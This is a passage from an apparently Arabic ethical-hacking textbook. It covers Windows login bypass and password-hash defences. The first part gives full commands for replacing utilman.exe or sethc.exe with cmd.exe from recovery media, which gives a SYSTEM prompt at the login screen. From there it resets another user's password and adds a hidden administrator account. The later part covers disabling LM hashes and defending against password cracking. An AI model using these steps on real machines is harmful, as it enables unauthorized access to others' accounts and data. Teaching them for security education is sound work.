‫ﯾﻌﻤﻞ ھﺬا ﻷن اﻟﻤﺴﺘﺨﺪم ﯾﻤﻜﻦ أن ﺗﺆدي ‪ Utilman‬ﻋﻦ طﺮﯾﻖ اﻟﻀﻐﻂ ﻋﻠﻰ ﻣﻔﺘﺎح وﯾﻨﺪوز‪ U +‬ﻗﺒﻞ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل إﻟﻰ وﯾﻨﺪوز‪ .‬ﺣﯿﺚ ھﺬا‬
‫ﺳﻮف ﯾﻘﻮم ﺑﺘﺸﻐﯿﻞ ﻣﻠﻒ ‪ Utilman.exe‬اﻟﻘﺎﺑﻞ ﻟﻠﺘﻨﻔﯿﺬ اﻟﺬي ﯾﺘﻮاﺟﺪ ﻓﻲ اﻟﻤﺠﻠﺪ‪ . Windows\System32‬إذا ﻗﻤﺖ ﺑﺘﺒﺪﯾﻞ اﻟﻤﻠﻒ‪Utilman.exe‬‬
‫ﻣﻊ ﺷﻲء آﺧﺮ ﻣﺜﻞ‪ ، cmd.exe‬ﻓﺴﻮف ﯾﻜﻮن ﻟﺪﯾﻚ ﺣﻖ اﻟﻮﺻﻮل إﻟﻰ ﻣﻮﺟﮫ اﻷواﻣﺮ ﻣﻊ اﻣﺘﯿﺎزات اﻟﻨﻈﺎم )‪ .(system privileges‬ﺣﺴﺎب‬
‫اﻣﺘﯿﺎزات اﻟﻨﻈﺎم )‪ (system privileges‬ھﻮ أﻋﻠﻰ اﻣﺘﯿﺎزات ﻣﻤﻜﻨﮫ ﻋﻠﻰ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ وﯾﻨﺪوز واﻟﺘﻲ ھﻲ ﻣﻤﺎﺛﻠﮫ ﻟﻠﺤﺴﺎب ‪ root‬ﻓﻲ أﻧﻈﻤﺔ‬
‫‪.linux‬‬

‫ﻛﯿﻒ ﯾﻤﻜﻦ اﻟﻘﯿﺎم ﺑﺬﻟﻚ‪:‬‬

‫‪ -‬أوﻻً وﻗﺒﻞ ﻛﻞ ﺷﻲء‪ ،‬ﺳﻮف ﺗﺤﺘﺎج إﻟﻰ وﺳﯿﻠﺔ ﻟﻠﻮﺻﻮل إﻟﻰ ﻧﻈﺎم اﻟﻤﻠﻔﺎت ﻟﻤﺒﺎدﻟﺔ ‪Utilman.exe‬ﻣﻊ ﺷﻲء آﺧﺮ ﻣﺜﻞ‪. cmd.exe‬‬
‫وھﻨﺎك ﻋﺪد ﻗﻠﯿﻞ ﻣﻦ اﻟﻄﺮق اﻟﺘﻲ ﺗﺤﻘﻖ ذﻟﻚ‪:‬‬
‫‪ ‬إزاﻟﺔ اﻟﻘﺮص اﻟﺼﻠﺐ اﻟﺬي ﯾﺤﺘﻮي ﻋﻠﻰ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ ﻣﻦ اﻟﻨﻈﺎم اﻟﻤﺴﺘﮭﺪف وﺟﻌﻠﮫ ﻗﺮص ﺛﺎﻧﻮي )‪ (slave‬ﻓﻲ ﻧﻈﺎم آﺧﺮ‪ .‬وﻣﻦ‬
‫ھﻨﺎك ﯾﻤﻜﻨﻚ ﻣﺒﺎدﻟﺔ اﻟﻤﻠﻔﺎت اﻟﻤﻮﺟﻮدة‪.‬‬
‫‪ ‬اﺳﺘﺨﺪام "ﻗﺮص اﻟﺘﻤﮭﯿﺪ" ﻣﺜﻞ ‪ UBCD4Win‬واﺳﺘﺨﺪام ﺑﺮاﻣﺞ إدارة ﻣﻠﻒ ھﻨﺎك او ‪ Live kali CD‬ﻛﻤﺎ ﺗﺤﺪﺛﻨﺎ ﻋﻨﮫ ﺳﺎﺑﻘﺎ‪.‬‬
‫‪ ‬اﺳﺘﺨﺪام أﺳﻄﻮاﻧﺔ ‪ DVD‬او ‪ CD‬اﻟﺬي ﺗﺤﺘﻮي ﻋﻠﻰ وﯾﻨﺪوز ‪Vista‬أو‪ 7‬او ‪.8‬‬

‫ﻟﻘﺪ ﺗﻜﻠﻤﺎن ﺳﺎﺑﻘﺎ اﻟﻰ ﻛﯿﻔﯿﺔ اﺳﺘﺨﺪام ‪ Live kali CD‬اﻣﺎ ھﻨﺎ ﺳﻮف ﻧﺴﺘﺨﺪم طﺮﯾﻘﺔ أﺧﺮى ﺣﯿﺚ ﻓﻲ ھﺬا اﻟﻤﺜﺎل ﺳﻮف ﻧﺴﺘﺨﺪم‬ ‫‪-‬‬
‫"وﯾﻨﺪوز ‪ ."DVD 7‬ﻟﻠﺒﺪء‪ ،‬اﻟﺘﻤﮭﯿﺪ ﻣﻦ ﻗﺮص ‪ DVD‬اﻟﺨﺎص ب ‪ Windows 7‬وﻋﻨﺪ اﻟﻮﺻﻮل إﻟﻰ اﻟﺸﺎﺷﺔ اﻷوﻟﻰ ﯾﺴﺄل ﻋﻦ اﻟﻠﻐﺔ‬
‫واﻟﻌﻤﻠﺔ وﺗﻨﺴﯿﻖ ﻟﻮﺣﺔ اﻟﻤﻔﺎﺗﯿﺢ‪ ،‬اﻧﻘﺮ ﻓﻮق ‪.NEXT‬‬
‫ﻓﻲ اﻟﺼﻔﺤﺔ اﻟﺘﺎﻟﯿﺔ‪ ،‬أﺳﻔﻞ اﻟﺻﻔﺣﺔ ﻓﻲ اﻟﺠﺎﻧﺐ اﻷﯾﺴﺮ اﻟﺴﻔﻠﻲ‪ ،‬اﻧﻘﺮ ﻓﻮق اﻻرﺗﺒﺎط "‪." Repair your computer‬‬ ‫‪-‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪389‬‬

‫اﻟﺨﻄﻮة ﺗﺎﻟﯿﺔ‪ ،‬ﻧﺤﺪد "‪ . “Use recovery tools that can help fix problems starting Windows‬ﺛﻢ ﻧﺤﺪد ﻧﻈﺎم‬ ‫‪-‬‬
‫اﻟﺘﺸﻐﯿﻞ إﺻﻼح‪ ،‬ﺑﻌﺪ اﺧﺘﺮ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ ﻣﻦ اﻟﻘﺎﺋﻤﺔ‪ ،‬ﻧﻨﻘﺮ ﻓﻮق ‪.Next‬‬

‫ﺳﯿﻜﻮن اﻻن ﻟﺪﯾﻚ ﺧﯿﺎر "‪ ." Choose a recovery tool‬ﻧﺤﺪد ﻣﻮﺟﮫ اﻷواﻣﺮ)‪. (Command prompt‬‬ ‫‪-‬‬
‫ﺗﻜﻮن اﻻن ﻗﺪ ﻓﺘﺤﺖ "ﻧﺎﻓﺬة ﻣﻮﺟﮫ اﻷواﻣﺮ"‪ .‬ﻧﻜﺘﺐ اﻷواﻣﺮ اﻟﺘﺎﻟﯿﺔ‪:‬‬ ‫‪-‬‬
‫\‪C:‬‬
‫‪cd windows\system32‬‬
‫‪ren utilman.exe utilman.exe.bak‬‬
‫‪copy cmd.exe utilman.exe‬‬
‫ﺣﯿﺚ ھﺬا ﺳﻮف ﯾﻨﺘﻘﻞ اﻟﻰ اﻟﻤﺠﻠﺪ ‪ system32‬ﺛﻢ ﯾﻘﻮم إﻋﺎدة ﺗﺴﻤﯿﺔ اﻟﻤﻠﻒ اﻷﺻﻠﻲ ‪ Utilman.exe‬اﻟﻰ أي اﺳﻢ اﺧﺮ ﺛﻢ ﯾﺄﺧﺬ ﻧﺴﺨﮫ ﻣﻦ اﻟﻤﻠﻒ‬
‫‪ cmd.exe‬وﯾﻌﯿﺪ ﺗﺴﻤﯿﺘﮭﺎ اﻟﻰ ‪ Utilman.exe‬ﻟﺘﺼﺒﺢ ھﻲ اﻟﻤﻠﻒ اﻟﺒﺪﯾﻞ ﻟﻠﻤﻒ اﻷﺻﻠﻲ‪.‬‬
‫ﺣﯿﺚ ان اﻟﻔﻜﺮة ﻗﺎﺋﻤﮫ ﻋﻠﻰ اﺳﺘﺒﺪال اﻟﻤﻠﻒ ‪ Utilman.exe‬ﺑﻤﻮﺟﮫ اﻷواﻣﺮ ‪ cmd.exe‬ﻋﻦ طﺮﯾﻖ ﺗﻐﯿﺮ اﻷﺳﻤﺎء ﻓﻘﻂ وﯾﻤﻜﻦ أﯾﻀﺎ اﺳﺘﺒﺪاﻟﮫ ﺑﺄي‬
‫ﻣﻠﻒ ﻗﺎﺑﻞ ﻟﻠﺘﻨﻔﯿﺬ اﺧﺮ‪.‬‬
‫ﺑﻤﺠﺮد ﺗﺸﻐﯿﻞ اﻟﻜﻤﺒﯿﻮﺗﺮ ﺑﺎﻟﻄﺮﯾﻘﺔ اﻟﻌﺎدﯾﺔ‪ ،‬ﻧﻨﻘﺮ ﻓﻮق ﺗﺮﻛﯿﺒﺔ اﻟﻤﻔﺎﺗﯿﺢ ‪ Windows + U‬واﻟﺘﻲ ﺗﺆدى اﻟﻰ اﻟﺤﺼﻮل ﻋﻠﻰ ﻣﻮﺟﮫ اﻷواﻣﺮ‪ .‬إذا ﻟﻢ‬
‫ﯾﻈﮭﺮ ﻣﻮﺟﮫ اﻷواﻣﺮ‪ ،‬ﻧﻨﻘﺮ ﻓﻮق ‪ Alt + Tab‬ﺣﯿﺚ ﻗﺪ ﯾﻈﮭﺮ ﻣﻮﺟﮫ اﻷواﻣﺮ ﻣﻦ وراء ﺷﺎﺷﺔ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل‪ .‬ﻣﻦ ھﻨﺎ‪ ،‬ﯾﻤﻜﻨﻚ ﺗﺸﻐﯿﻞ اﻟﻜﺜﯿﺮ )أن‬
‫ﻟﻢ ﯾﻜﻦ ﻛﻠﮭﺎ( ﻣﻦ اﻷواﻣﺮ اﻟﺘﻲ ﯾﻤﻜﻦ اﺳﺘﺨﺪاﻣﮭﺎ ﻋﺎدة ﻓﻲ ﻣﻮﺟﮫ اﻷواﻣﺮ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪390‬‬

‫إﻋﺎدة ﺗﻌﯿﯿﻦ ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﺨﺎﺻﺔ ﺑﻤﺴﺘﺨﺪﻣﯿﻦ اﻟﻤﻮﺟﻮدة‬


‫ﺗﺤﺬﯾﺮ‪ :‬إذا ﻛﺎن ﯾﻤﻜﻨﻚ إﻋﺎدة ﺗﻌﯿﯿﻦ ﻛﻠﻤﺔ ﻣﺮور ﻟﺤﺴﺎب ﻣﺴﺘﺨﺪﻣﯿﻦ‪ .‬ﻓﺈﻧﻚ ﺗﻔﻘﺪ اﻟﻮﺻﻮل إﻟﻰ اﻟﻤﻠﻔﺎت اﻟﻤﺸﻔﺮة اﻟﺨﺎﺻﺔ ﺑﺎﻟﻤﺴﺘﺨﺪﻣﯿﻦ‬
‫ﺑﺸﻜﻞ داﺋﻢ‪ .‬ﻟﺬﻟﻚ ﺗﺄﻛﺪ ﻣﻦ إﺟﺮاء ﻧﺴﺦ اﺣﺘﯿﺎطﻲ ﻟﮭﺬه اﻟﻤﻠﻔﺎت‪.‬‬
‫‪ -‬ﻹﻋﺎدة ﺗﻌﯿﯿﻦ ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﺨﺎﺻﺔ ﺑﻤﺴﺘﺨﺪم ﻣﻮﺟﻮد‪ ،‬ﻓﻨﺤﻦ ﺑﺤﺎﺟﺔ إﻟﻰ ﻛﺘﺎﺑﺔ اﻟﻨﺺ اﻟﺘﺎﻟﻲ‪ .‬ﻓﻲ ھﺬا اﻟﻤﺜﺎل‪ ،‬ﺳﻮف ﻧﻘﻮم ﺑﺘﻐﯿﯿﺮ ﻛﻠﻤﺔ‬
‫اﻟﻤﺮور اﻟﻤﺴﺘﺨﺪم ‪JohnDoe’s‬إﻟﻰ‪. "hunter2″‬‬
‫‪net user JohnDoe hunter2‬‬
‫ﯾﺠﺐ أن ﺗﻜﻮن ﻗﺎدرا ً ﻋﻠﻰ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﺑﺎﺳﺘﺨﺪام ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﺠﺪﯾﺪة ھﺬه ﻋﻠﻰ اﻟﻔﻮر‪.‬‬
‫‪ -‬إذا ﻛﻨﺖ ﻻ ﺗﻌﺮف ﻓﻲ اﻟﻮاﻗﻊ اﺳﻢ اﻟﻤﺴﺘﺨﺪم ﻓﻲ ھﺬا اﻟﻨﻈﺎم‪ ،‬ﯾﻤﻜﻨﻚ أن ﺗﺮى ﻗﺎﺋﻤﺔ ﺑﺎﻟﻤﺴﺘﺨﺪﻣﯿﻦ اﻟﺤﺎﻟﯿﻦ ﻋﻦ طﺮﯾﻖ ﻛﺘﺎﺑﺔ اﻻﺗﻲ‪:‬‬
‫‪net user‬‬
‫‪ -‬ﻹﻧﺸﺎء ﺣﺴﺎب ﻣﺴﺘﺨﺪم ﺟﺪﯾﺪ‬
‫ﻹﻧﺸﺎء ﺣﺴﺎب ﻣﺴﺘﺨﺪم ﺟﺪﯾﺪ ﻓﻲ ﻣﻮﺟﮫ اﻷواﻣﺮ )اﺳﻢ اﻟﻤﺴﺘﺨﺪم‪ NewGuy :‬وﻛﻠﻤﺔ اﻟﻤﺮور‪ ،(abc123 :‬وإﺿﺎﻓﺘﮭﺎ إﻟﻰ اﻟﺠﺮوب اﻟﺨﺎص‬
‫ﺑﺎﻟﻤﺴﺌﻮﻟﯿﻦ ﻋﻦ طﺮﯾﻖ ﻛﺘﺎﺑﺔ اﻻﺗﻲ‪:‬‬
‫‪net user NewGuy abc123 /add‬‬
‫‪net localgroup Administrators NewGuy /add‬‬
‫ﻣﺮة أﺧﺮى‪ ،‬ﯾﺠﺐ أن ﺗﻜﻮن ﻗﺎدرا ً ﻋﻠﻰ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﻋﻠﻰ اﻟﻔﻮر ﻣﻊ ھﺬا اﻟﺤﺴﺎب اﻟﺠﺪﯾﺪ‪.‬‬
‫ﺗﻐﯿﯿﺮات اﻟﻌﻮدة‬
‫ﻻﺳﺘﻌﺎدة‪ ، utilman.exe‬ﻓﻲ ﻣﻮﺟﮫ اﻷواﻣﺮ ﻧﻜﺘﺐ اﻻﺗﻲ‪:‬‬
‫‪C:‬‬
‫‪cd windows\system32‬‬
‫‪del utilman.exe‬‬
‫‪ren utilman.exe.bak utilman.exe‬‬
‫ﺛﻢ إﻋﺎدة ﺗﺸﻐﯿﻞ اﻟﻨﻈﺎم‪.‬‬
‫ﻹزاﻟﺔ ﺣﺴﺎب اﻟﻤﺴﺘﺨﺪم اﻟﺠﺪﯾﺪ اﻟﺬي ﻗﻤﺖ ﺑﺈﻧﺸﺎﺋﮫ ﻓﻲ وﻗﺖ ﺳﺎﺑﻖ‪ ،‬ﻧﻜﺘﺐ اﻻﺗﻲ‪:‬‬
‫‪net user NewGuy /delete‬‬
‫ھﺬا ﯾﻌﻤﻞ ﻓﻲ ﻛﺎﻓﺔ إﺻﺪارات ﻣﺎﯾﻜﺮوﺳﻮﻓﺖ وﯾﻨﺪوز ﺑﺪاﯾﺔ ﻣﻦ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ وﯾﻨﺪوز ‪ x9‬اﻟﻰ اﺧﺮ اﺻﺪار ﺣﺘﻰ اﻻن‪ .‬ﻛﻤﺎ أﻧﮭﺎ ﺗﻌﻤﻞ ﻓﻲ اﻟﻤﻨﺘﺠﺎت‬
‫‪ Server‬اﻟﺨﺎﺻﺔ ﺑﮭﻢ‪.‬‬
‫ﯾﻤﻜﻨﻚ أﯾﻀﺎ اﺳﺘﺨﺪام اﻷداة ‪ Mimikatz‬ﻟﻠﺘﻌﺎﻣﻞ ﻣﻊ ﻛﻠﻤﺎت ﻣﺮور ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل‪.‬‬

‫اﻟﺘﻌﺪﯾﻞ ﻋﻠﻰ اﻟﻤﻠﻒ "‪ "Sethc.exe‬ﺑﻨﻔﺲ اﻟﻄﺮﯾﻘﺔ اﻟﺴﺎﺑﻘﺔ ﯾﺴﻤﺢ أﯾﻀﺎ ﻟﻚ ﺑﺘﺠﺎوز ﺷﺎﺷﺔ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﻟﻮﯾﻨﺪوز‪ .‬واﻟﻤﻠﻒ"‪ "sethc.exe‬ھﻮ‬
‫ﻟﻮظﯿﻔﺔ ‪ .Windows Sticky Keys‬ﻓﻲ إطﺎر اﻟﻌﻤﻠﯿﺔ اﻟﻌﺎدﯾﺔ‪ ،‬إذا ﻗﻤﺖ ﺑﺎﻟﻀﺮب ﻋﻠﻰ ﻣﻔﺘﺎح ‪Shift‬ﺧﻤﺲ ﻣﺮات ﻋﻠﻰ اﻟﺘﻮاﻟﻲ‪ ،‬ﻓﮭﺬا ﺳﻮف‬
‫ﯾﺆدى اﻟﻰ ظﮭﻮر ﻣﺮﺑﻊ اﻟﺤﻮار ‪ .sticky key dialog box‬ﺑﺎﺳﺘﺨﺪام ﻧﻔﺲ اﻟﻄﺮﯾﻖ اﻟﺴﺎﺑﻘﺔ واﻟﺘﻲ ﻗﻤﻨﺎ ﺑﮭﺎ ﻣﻊ ‪ ،Utilman.exe‬ﻓﺒﻤﺠﺮد‬
‫اﻟﻀﺮب ﻋﻠﻰ ﻣﻔﺘﺎح ‪ shift‬ﺧﻤﺲ ﻣﺮات ﻓﻲ ﺷﺎﺷﺔ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﻓﺎﻧﮫ ﯾﺆدى اﻟﻰ ﻓﺘﺢ ﻣﻮﺟﮫ اﻷواﻣﺮ ﻋﻠﻰ ﻣﺴﺘﻮى اﻟﻨﻈﺎم‪.‬‬

‫‪LM Hash Backward Compatibility‬‬

‫‪ LM Hash Backward Compatibility‬ھو ﺧﺎدم ﯾﺳﺗﻧد إﻟﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ‪ Windows 2000‬و ‪ Windows Server 2003‬و‬
‫ﯾﻣﻛﻧﮫ ﻣﺻﺎدﻗﺔ اﻟﻣﺳﺗﺧدﻣﯾن اﻟﺗﻲ ﺗﻘوم ﺑﺗﺷﻐﯾل ﺟﻣﯾﻊ إﺻدارات وﯾﻧدوز‪ .‬ﻋﻣﻼء ‪ Windows 95/98‬ﻻ ﺗﺳﺗﺧدم ‪ Kerberos‬ﻓﻲ اﻟﻣﺻﺎدﻗﺔ‪.‬‬
‫ﻣن أﺟل ‪ ،Backward Compatibility‬ﻓﺎن وﯾﻧدوز ‪ 2000‬و ‪Windows Server 2003‬ﺗدﻋم اﻻﺗﻲ‪:‬‬
‫‪LAN Manager (LM) authentication‬‬
‫‪Windows NT (NTLM) authentication‬‬
‫‪NTLM version 2 (NTLMv2) authentication‬‬
‫ﯾﺗم اﺳﺗﺧدام ‪ (Unicode hash) NT Hash‬ﻓﻲ ‪ NTLMv2 ،NTLMv1‬و‪ .Kerberos‬ﯾﺳﺗﺧدم ﺑروﺗوﻛول اﻟﻣﺻﺎدﻗﺔ ‪."LM hash" LM‬‬
‫ﻻ ﺗﻘم ﺑﺗﺧزﯾن ‪ ،LM hash‬إذا ﻟم ﯾﻛن ﺿرورﯾﺎ‪ ،‬ﻣن أﺟل اﻟﺗواﻓﻖ ﻣﻊ اﻹﺻدارات اﻟﺳﺎﺑﻘﺔ‪ .‬إذا ﺗم ﺗﺧزﯾن ‪ ،LM hash‬ﻓﺎن ﻋﻣﻼء ﺷﺑﻛﺎت‬
‫‪ Windows98 ،Windows95‬أو ﻣﺎﻛﻧﺗوش ﻗد ﺗواﺟﮫ ﻣﺷﺎﻛل اﻟﺗواﻓﻖ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


391

(How to Disable LM HASH) LM HASH ‫ﻛﯾﻔﯾﺔ اﻟﻐﺎء ﺗﻔﻌﯾل اﺳﺗﺧدام‬

:‫ﻛﺎﻻﺗﻰ‬LM hash ‫ﯾوﺟد ﻋدة طرق ﻹﻟﻐﺎء ﺗﻔﻌﯾل‬

(Implement the NoLMHash Policy by Using a Group Policy) Group policy ‫ ﺑﺎﺳﺗﺧدام‬NoLMHash ‫ ﺗﻧﻔﯾذ ﺳﯾﺎﺳﺔ‬-1
:‫ ﻧﺗﺑﻊ اﻟﺧطوات ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‬،local group policy ‫ ﻣن ﺧﻼل ﺗطﺑﯾﻖ ﻧﮭﺞ‬SAM ‫ ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت‬LM hash ‫ﻟﺗﻌطﯾل ﺗﺧزﯾن‬
- In Windows version  In Control Panel  Administrative Tools  Local Security Policy  Local
Policies  Security Options.
- In Windows server version  In Group policy, select Computer Configuration  Windows Setting
 Security Setting  Local Policies  Security Options.
- In the list of available policies, double-click Network security: Do not store LAN Manager Hash
value on next password change
- Click Enabled  Ok

.8‫ و‬7‫ وﺗﻛون ﻓﻲ ھذا اﻟوﺿﻊ اﻓﺗراﺿﯾﺎ ﻓﻲ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺑداﯾﺔ ﻣن ﻓﯾﺳﺗﺎ و‬Enable ‫ﻛﻣﺎ ﻧﻼﺣظ ﯾﺟب ان ﺗﻛون ﻓﻲ وﺿﻊ‬
(Implement the NoLMHash Policy by Editing the Registry) ‫ ﻋن طرﯾﻖ ﺗﻌدﯾل ﻣﻠف اﻟﺳﺟل‬NoLMHash ‫ ﺗﻧﻔﯾذ ﺳﯾﺎﺳﺔ‬-2
registry ‫وذﻟك ﻋن طرﯾﻖ إﯾﺟﺎد اﻟﻣﻔﺗﺎح اﻟﺗﺎﻟﻲ ﻓﻲ ﻣﻠف‬
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
NoLMHash ‫ﺛم ﻧﻘوم ﺑﺈﺿﺎﻓﺔ ﻣﻔﺗﺎح‬

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪392‬‬

‫‪ -3‬ﻧﺳﺗﺧدم ﻛﻠﻣﺎت ﻣرور واﻟﺗﻲ ﻋﻠﻰ اﻷﻗل أﻛﺑر ﻣن ‪ 15‬ﻗﯾﻣﺔ )‪(Use a Password that is at Least 15 Characters Long‬‬
‫ﺣﯾث ان ﻧواﻓذ اﻟوﯾﻧدوز ﺗﻘوم ﺑﺗﺷﻔﯾر ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﺻورة ‪ LM HASH‬واﻟﺗﻲ ﺗﻛون اﻗل ﻣن ‪ 15‬ﺣرف اﻣﺎ ﻣﺎ ﯾزﯾد ﻓﻠن ﯾﺳﺗطﯾﻊ‬
‫ﺗﺧزﯾﻧﮫ ﻓﻲ ﺻورة ‪ LM hash‬ﺣﯾث ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ ان ﺳﻌﺗﮫ ‪ 14‬ﺣرف ﻓﻘط‪.‬‬

‫ﻛﯾف ﺗداﻓﻊ ﺿد ھﺟﻣﺎت ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ‪How to Defend Against Password Cracking‬‬

‫ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور )‪ ،(Password Cracking‬واﻟﻣﻌروف أﯾﺿﺎ ‪ ،Password Hacking‬ھو ﻣﺻطﻠﺢ ﯾﺳﺗﺧدم ﻟﺗﺣدﯾد ﻋﻣﻠﯾﺔ اﻛﺗﺳﺎب‬
‫اﻻﺳﺗﺧدام اﻟﻐﯾر ﻣﺻرح ﺑﮫ ﻟﻠﺷﺑﻛﺔ‪ ،‬ﻧظﺎم‪ ،‬أو اﻟﻣوارد اﻟﺗﻲ ﯾﺗم ﺗﺄﻣﯾﻧﮭﺎ ﻣﻊ ﻛﻠﻣﺔ ﻣرور‪ .‬اﻟطرﯾﻘﺔ اﻷﺳﺎﺳﯾﺔ ﻟﺗﻛﺳﯾر ﻛﻠﻣﺔ ﻣرور ھو ﺗﺧﻣﯾن ﻛﻠﻣﺔ‬
‫اﻟﻣرور‪ .‬طرﯾﻘﺔ أﺧرى ھﻲ ﻣﺣﺎوﻟﺔ ﺗوﻟﯾﻔﺎت ﻣﺧﺗﻠﻔﺔ ﻣرارا وﺗﻛرارا‪ .‬ﯾﺗم ذﻟك ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺔ اﻟﻛﻣﺑﯾوﺗر ﺣﯾث اﻟﻛﻣﺑﯾوﺗر ﯾﺣﺎول ﺗوﻟﯾﻔﺎت‬
‫ﻣﺧﺗﻠﻔﺔ ﻣن اﻷﺣرف وﺣﺗﻰ ﯾﺣﺻل ﻋﻠﻰ ﻣزﯾﺞ ﻧﺎﺟﺢ‪ .‬إذا ﻛﻠﻣﺔ اﻟﺳر ھﻲ ﺿﻌﯾﻔﺔ‪ ،‬وﻣن ﺛم ﯾﻣﻛن ان ﺗﺻدع ﺑﺳﮭوﻟﺔ‪ .‬ﻣن أﺟل ﺗﺟﻧب ﻣﺧﺎطر‬
‫ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ھﻧﺎك ﺑﻌض اﻟطرق اﻟﺗﻲ ﺗﺳﺎﻋدك ﻋﻠﻰ اﻟدﻓﺎع ﻋن ﻧﻔﺳك ﺿد ﺗﻛﺳﯾر ﻛﻠﻣﺔ ﻣرور وھم ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -1‬ﻻ ﻧﺷﺎرك ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﻣﻊ أي ﺷﺧص‪ ،‬ﺣﯾث أن ھذا ﯾﺳﻣﺢ ﻟﺷﺧص آﺧر ﻟﻠوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑك ﻣﺛل‬
‫ﻣوظﻔﻲ اﻟدرﺟﺎت ودﻓﻊ اﻟﺑﯾﺎﻧﺎت واﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﻘﺗﺻر ﻋﺎدة ﻟك‪.‬‬
‫‪ -2‬ﻻ ﺗﺳﺗﺧدم ﻧﻔس ﻛﻠﻣﺔ اﻟﻣرور أﺛﻧﺎء ﺗﻐﯾﯾر ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬أو أي واﺣد ﻣﺗﺷﺎﺑﮫ إﻟﻰ ﺣد ﻛﺑﯾر ﻣﻊ اﻟﻣﺳﺗﺧدﻣﺔ ﺳﺎﺑﻘﺎ‪.‬‬
‫‪ -3‬ﺗﻣﻛﯾن ﺗدﻗﯾﻖ اﻷﻣﺎن ﻟﻠﻣﺳﺎﻋدة ﻋﻠﻰ رﺻد وﺗﺗﺑﻊ ھﺟﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫‪ -4‬ﻻ ﺗﺳﺗﺧدم ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﯾﻣﻛن اﻟﻌﺛور ﻋﻠﯾﮭﺎ ﻓﻲ اﻟﻘﺎﻣوس‪.‬‬
‫‪ -5‬ﻻ ﺗﺳﺗﺧدم اﻟﺑروﺗوﻛوﻻت ذات اﻟﻧص اﻟواﺿﺢ واﻟﺑروﺗوﻛوﻻت ذات اﻟﺗﺷﻔﯾر اﻟﺿﻌﯾف ﻓﻲ اﺗﺻﺎﻻﺗﮭم‪.‬‬
‫‪ -6‬ﺗﻌﯾﯾن ﻧﮭﺞ ﺗﻐﯾﯾر ﻛﻠﻣﺔ اﻟﻣرور)‪ (password change policy‬ﻛﻠﻣﺎ ﻛﺎن ذﻟك ﻣﻣﻛﻧﺎ‪ ،‬أي‪ ،‬ﻛل ‪ 30‬ﯾوﻣﺎ‪.‬‬
‫‪ -7‬ﺗﺟﻧب ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻣﻛﺎن ﻏﯾر ﻣﺿﻣون ﻷن ﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ أﻣﺎﻛن ﻣﺛل ﻣﻠﻔﺎت اﻟﻛﻣﺑﯾوﺗر ﯾﺗﻌرﺿون‬
‫ﺑﺳﮭوﻟﺔ ﻟﻠﮭﺟﻣﺎت‪.‬‬
‫‪ -8‬ﻻ ﺗﺳﺗﺧدم ﻛﻠﻣﺎت اﻟﺳر اﻻﻓﺗراﺿﯾﺔ ﻷي ﻧظﺎم‪.‬‬
‫‪ -9‬ﺟﻌل ﻣن اﻟﺻﻌب ﺗﺧﻣﯾن ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﺛﻣﺎﻧﯾﺔ إﻟﻰ اﺛﻧﻲ ﻋﺷر ﺣرﻓﺎ ورﻗﻣﺎ ﻓﻲ ﻣزﯾﺞ ﻣن اﻷﺣرف اﻟﻛﺑﯾرة واﻟﺻﻐﯾرة واﻷرﻗﺎم‬
‫واﻟرﻣوز‪ .‬ﻛﻠﻣﺎت ﻣرور ﻗوﯾﺔ ﯾﺻﻌب ﺗﺧﻣﯾﻧﮭﺎ‪ .‬ﻛﻠﻣﺎ ازداد ﺗﻌﻘﯾد ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ﻛﻠﻣﺎ ﻗل ﺧﺿوﻋﮭﺎ ﻟﻠﮭﺟﻣﺎت‪.‬‬
